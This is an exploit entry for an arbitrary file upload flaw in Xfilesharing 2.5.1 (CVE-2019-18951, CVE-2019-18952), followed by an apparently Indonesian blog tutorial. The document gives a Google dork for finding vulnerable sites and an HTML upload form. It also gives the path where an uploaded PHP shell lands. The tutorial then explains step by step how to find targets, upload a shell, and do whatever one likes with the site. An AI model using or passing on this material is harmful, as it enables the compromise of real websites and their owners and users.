# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
#Exploit Author: Noman Riffat
# Vendor Homepage :
https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952
#####################
Arbitrary File Upload
#####################
<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>
Shell : http://xyz.com/cgi-bin/temp/joe/shell.php
Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman
|
[#] Dork and CSRF disini
https://pastebin.com/raw/xjv5kK5V |
1. Dorking dulu kalo dah nemu target masukin Exploit nya contoh :
http://localhost/?op=registration
Ubah ke http://localhost/cgi-bin/up.cgi
Jadi ?op=registration ubah ke cgi-bin/up.cgi
Vuln? Blank
2. Simpan CSRF dalam format html
Copy target yang vuln lalu paste di CSRF lalu simpan
(Btw buat kalian yang ga mau ribet, bisa pakai CSRF online type filenya "file" nanti path dir nya ke http://localhost/cgi-bin/temp/shell.php)
3. Ubah text menjadi text yang anda inginkan
Lalu upload Shell
4. Setelah terupload letak file akan terupload di
http://localhost/cgi-bin/temp/"text lo"/shell.php
contoh yang ada digambar bawah :
http://localhost/cgi-bin/temp/maxxct/1han.php
5. Setelah itu terserah kalian web nya mau diapain
Ok sekian dulu...
Referensi :
Komentar ini telah dihapus oleh pengarang.
BalasHapusGak
Hapus